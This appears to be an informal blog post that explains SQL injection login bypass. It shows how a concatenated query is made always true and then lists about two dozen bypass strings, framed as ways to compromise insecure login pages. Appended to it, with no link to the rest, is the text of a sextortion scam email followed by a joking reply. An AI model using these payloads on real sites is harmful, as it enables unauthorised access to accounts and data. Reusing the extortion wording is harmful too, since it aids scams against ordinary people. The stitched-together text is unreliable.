Well, I am going to describe you some SQL strings which we use to compromise insecure login pages.
But only using the given string will make you script kiddie so going to explain it how it works.
Generally Dynamic websites are related to Databases which stores information regarding everything like user login id and pass and all.
so this data is fetched in sites using SQL queries. in general term SQL queries are commands used in Database providing software’s. ex: -MS SQL Server, Oracle, MS Access, MySQL etc.
now the main part when user have to check and compare data in database, they use one query. (in login page they have to match data provided by user and data exist in database table if matches give you further access) for checking this info they use below query.
select * from tbladmin where adminid="' & txtfiels & '" and pass="' & txtpass & '" when you use the strings like x' or 'x'='x
it will make this query as
select * from tbladmin where adminid=" 'x' or 'x'='x' " and pass=" ' x' or 'x'='x' "
and as per query x is always =(equal) to x it writes true and gives entry to the user into admin panel.
this is how SQL authentication bypass vuln work.
below are some common strings used in this.
admin'-- x' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
[Phishing Mail Real Message]
So, when you had fun on piquant sites (you know what I mean!), I made screenshot using my program from your camera device.
After that, I combined them with the content of the currently viewed site.
There will be laughter when I send these photos to your contacts! BUT I’m sure you don’t want this to happen. --------
My broken camera already stopped working for a some time and the website I frequently visit is http://exabytes.sg. Now you really make me laugh, I get your joke! LOL!